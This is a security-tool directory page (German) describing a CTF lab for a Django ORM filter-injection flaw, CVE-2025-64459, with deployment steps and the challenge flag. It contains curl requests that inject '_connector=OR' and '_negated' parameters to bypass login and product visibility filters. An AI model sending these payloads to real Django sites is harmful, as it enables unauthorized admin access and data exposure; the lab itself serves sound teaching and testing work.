Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-64459 — CTF-Herausforderung, die Django-ORM-Filter-Injektion (CVE-2025-64459) mit Auth-Bypass- und Produktfilter-Bypass-Exploits demonstriert, einschließlich Bereitstellung und Flag-Abruf. | Kitploit
Tools/GitHubGitHub/z3yr0xx/cve-2025-64459
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitCTFLernen & BildungLabs & Praxis
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTF-Herausforderung, die Django-ORM-Filter-Injektion (CVE-2025-64459) mit Auth-Bypass- und Produktfilter-Bypass-Exploits demonstriert, einschließlich Bereitstellung und Flag-Abruf.

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CTF-Challenge: Django ORM Injection (CVE-2025-64459)

Kategorie: Web-Sicherheit
Schwierigkeit: Mittel
Schwachstelle: CVE-2025-64459 – Django ORM Filter Injection

📝 Beschreibung

Wir haben einen sicheren Merch-Shop mit Admin-Panel gebaut. Kannst du die Authentifizierung umgehen und die private Admin-Notiz finden

URL: http://YOUR_SERVER:6008

🚀 Bereitstellung

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 Exploits (CVE-2025-64459)

Auth-Bypass (/login/)

root@kitploit:~
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Produktfilter-Bypass (/)

root@kitploit:~
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 Flagge

lol-you-here_then-you_exploited_me

Tool herunterladen